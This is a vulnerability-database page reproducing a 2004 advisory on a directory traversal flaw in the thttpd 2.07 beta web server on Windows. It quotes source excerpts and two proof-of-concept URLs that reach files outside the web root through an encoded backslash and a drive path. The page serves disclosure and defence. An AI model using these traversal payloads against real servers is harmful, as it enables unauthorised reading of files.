Lucene search

K

thttp207.txt

๐Ÿ—“๏ธย 05 Aug 2004ย 00:00:00Reported byย CoolICETypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 19ย Views

Directory traversal vulnerability in thttpd version 2.07 beta on Windows discovered on 2004-08-04.

Show more
Code
`Application: thttpd  
Vendors: http://www.acme.com/software/thttpd/  
Version: 2.07 beta 0.4 10dec99  
Platforms: Windows  
Bug: Directory Traversal  
Date: 2004-08-04  
Author: CoolICE  
e-mail: CoolICE#China.com  
================  
Content:  
in libhttpd.c:  
int  
httpd_parse_request( httpd_conn* hc )  
[...]  
if ( hc->decodedurl[0] != '/' )  
{  
httpd_send_err( hc, 400, httpd_err400title, httpd_err400form, "" );  
return -1;  
}  
  
static int  
really_start_request( httpd_conn* hc )  
[...]  
if ( stat( hc->expnfilename, &hc->sb ) < 0 )  
{  
httpd_send_err( hc, 500, err500title, err500form, hc->encodedurl );  
return -1;  
}  
------------------  
TestCode:  
http://localhost/%5c../test.ini  
http://localhost/c:\test.ini  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
05 Aug 2004 00:00Current
7.4High risk
Vulners AI Score7.4
19
.json
Report